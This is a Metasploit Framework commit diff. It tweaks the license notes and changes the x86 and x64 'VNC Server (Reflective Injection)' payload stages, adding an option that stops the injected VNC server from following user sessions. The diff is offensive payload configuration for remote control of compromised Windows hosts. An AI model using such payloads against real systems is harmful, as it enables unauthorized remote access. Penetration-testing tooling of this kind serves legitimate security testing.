and the bins, tiny modification to the ruby side and update the README.

git-svn-id: file:///home/svn/framework3/trunk@8891 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-05 14:57:30 +01:00 · 2010-03-24 00:03:32 +00:00 · 2010-03-24 00:03:32 +00:00 · 75661291fa
commit 75661291fa
parent 9a4293c445
5 changed files with 27 additions and 11 deletions
--- a/2
+++ b/2
@ -37,7 +37,7 @@ This license does not apply to the following components:
   corresponding header files in the source tree
 - The Packet Sniffer SDK (MicroOLAP) library embedded into the Meterpreter
   Sniffer extension. HD Moore has a single-seat developer license.
- - The vncdll.dll and vncdll.x64.dll binaries and their associated source code (modified TightVNC)
+ - The modified TightVNC binaries and their associated source code.
 - The icons used by msfweb that were not created by Metasploit
 - The Bit-Struct library located under lib/bit-struct
 - The Byakugan plugin located under external/source/byakugan
--- a/data/vncdll.dll
+++ b/data/vncdll.dll
--- a/data/vncdll.x64.dll
+++ b/data/vncdll.x64.dll
--- a/modules/payloads/stages/windows/vncinject.rb
+++ b/modules/payloads/stages/windows/vncinject.rb
@ -12,7 +12,7 @@ require 'msf/base/sessions/vncinject'
 module Metasploit3

 	include Msf::Payload::Windows::ReflectiveDllInject
-  
+	
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'          => 'VNC Server (Reflective Injection)',
@ -20,7 +20,7 @@ module Metasploit3
 			'Description'   => 'Inject a VNC Dll via a reflective loader (staged)',
 			'Author'        => [ 'sf' ],
 			'Session'       => Msf::Sessions::VncInject ))
-      
+			

 		# Override the DLL path with the path to the meterpreter server DLL
 		register_options(
@ -48,11 +48,17 @@ module Metasploit3
 		register_advanced_options(
 			[
 				OptBool.new('DisableCourtesyShell',
-					[
-						false,
-						"Disables the Metasploit Courtesy shell",
-						false
-					])
+				[
+					false,
+					"Disables the Metasploit Courtesy shell",
+					false
+				]),
+				OptBool.new('DisableSessionTracking',
+				[
+					false,
+					"Disables the VNC payload from following the active session as users log in an out of the input desktop",
+					false
+				])
 			], self.class)
 		options.remove_option('DLL')
 	end
@ -71,6 +77,8 @@ module Metasploit3

 		flags |= 1 if (datastore['DisableCourtesyShell'])

+		flags |= 2 if (datastore['DisableSessionTracking'])
+
 		# Transmit the one byte flag
 		session.rstream.put([ flags ].pack('C'))

--- a/modules/payloads/stages/windows/x64/vncinject.rb
+++ b/modules/payloads/stages/windows/x64/vncinject.rb
@ -21,7 +21,7 @@ require 'msf/base/sessions/vncinject'
 module Metasploit3

 	include Msf::Payload::Windows::ReflectiveDllInject_x64
-  
+	
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'          => 'Windows x64 VNC Server (Reflective Injection)',
@ -29,7 +29,7 @@ module Metasploit3
 			'Description'   => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)',
 			'Author'        => [ 'sf' ],
 			'Session'       => Msf::Sessions::VncInject ))
-      
+			

 		# Override the DLL path with the path to the meterpreter server DLL
 		register_options(
@ -61,6 +61,12 @@ module Metasploit3
 						false,
 						"Disables the Metasploit Courtesy shell",
 						false
+					]),
+				OptBool.new('DisableSessionTracking',
+					[
+						false,
+						"Disables the VNC payload from following the active session as users log in an out of the input desktop",
+						false
 					])
 			], self.class)
 		options.remove_option('DLL')
@ -79,7 +85,9 @@ module Metasploit3
 		flags = 0

 		flags |= 1 if (datastore['DisableCourtesyShell'])
-
+		
+		flags |= 2 if (datastore['DisableSessionTracking'])
+		
 		# Transmit the one byte flag
 		session.rstream.put([ flags ].pack('C'))